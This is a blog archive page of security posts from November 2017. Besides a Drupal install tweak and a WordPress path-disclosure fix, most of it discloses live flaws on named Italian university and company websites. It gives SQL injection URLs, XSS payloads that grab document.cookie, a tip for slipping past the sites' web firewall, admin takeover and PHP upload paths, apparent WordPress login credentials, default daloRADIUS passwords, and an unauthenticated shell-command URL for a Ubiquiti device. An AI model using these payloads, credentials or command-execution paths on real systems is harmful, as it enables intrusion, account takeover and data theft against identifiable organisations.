Skip to main content

Posts

Showing posts from November, 2017

How to fix drupal installation with 32bit php version

Install Drupal on a server with a 32bit version of PHP.
If you want to install drupal on your TEST server even if you have a 32bit version of php

you need to edit:
core/modules/system/system.install
and comment out ( ~line 973):


  if (PHP_INT_SIZE <= 4) {
    $requirements['limited_date_range'] = [
      'title' => t('Limited date range'),
      'value' => t('Your PHP installation has a limited date range.'),
      'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),
      'severity' => REQUIREMENT_WARNING,
    ];
  }

It's highly suggested to update to a recent 64bit version of PHP.

unina.it/ | blind sql injection, xss, data leak, system compromise etc

There's a sort of WAF on all the websites but it can be easily tricked by not using the most common terms like /passwd, etc.
-
http://www.dieti.unina.it
Ubuntu
Joomla 2.5.8

Admin can be changed (admin takeover) even if there's the external login for the users.
php files  can be uploaded via
administrator/components/com_media/helpers/media.php

com_gcalendar  is vulnerable and should be upgraded to dpcalendar.

---

http://www.digita.unina.it/
wordpress 4.8.1
http://www.digita.unina.it/digita/wp-login.php
sds_dj32f
lizzi

---

http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]

archived error:http://archive.is/Zw3Ua
/home/httpd/elettrotecnica/grupponazionale/

---
XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E

---

SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7

sample error archived: http://archive.is/2SO9a

select DATE_FORMAT(ne…

sefsas.it | sql injection

Sql Injection in the email confirmation url (there are several other):

http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]

ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf

full query sample in output

http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

archived:http://archive.is/xDVeh
XSS
https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script>


SQL Injection
https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici

archived error:http://archive.is/9bJfo

Wordpress <=4.8.3 - how to raise errors and (possibly) get the path + [FIX]

Simple Fix:
if (!defined( 'ABSPATH')) exit; _________
Urls that can give you errors with local folder paths on Wordpress 4.8.3 and previous versions:
/wp-includes/customize/class-wp-customize-background-image-control.php
/wp-includes/customize/class-wp-customize-background-image-setting.php
/wp-includes/customize/class-wp-customize-background-position-control.php
/wp-includes/customize/class-wp-customize-color-control.php
/wp-includes/customize/class-wp-customize-cropped-image-control.php
/wp-includes/customize/class-wp-customize-custom-css-setting.php
/wp-includes/customize/class-wp-customize-filter-setting.php
/wp-includes/customize/class-wp-customize-header-image-control.php
/wp-includes/customize/class-wp-customize-header-image-setting.php
/wp-includes/customize/class-wp-customize-image-control.php
/wp-includes/customize/class-wp-customize-media-control.php
/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
/wp-includes/customize/class-wp-customize-nav…

linux day 2017 guardia san framondi - various stuff discovered

During the linux day 2017 at guardia sanframondi I played with my phone on the local network ... with the browser (and google to get informations on vulnerabilities).

-Linuxday wifi-

daloRADIUS default password
user:administrator
password:radius
admin/admin
ip:192.168.1.249
http://192.168.1.249

Ubiquity device (wifi antenna/ap)
 ip:192.168.1.20
Unauthenticated command execution
https://192.168.1.20/pingtest_action.cgi?command=[anyshellcommand]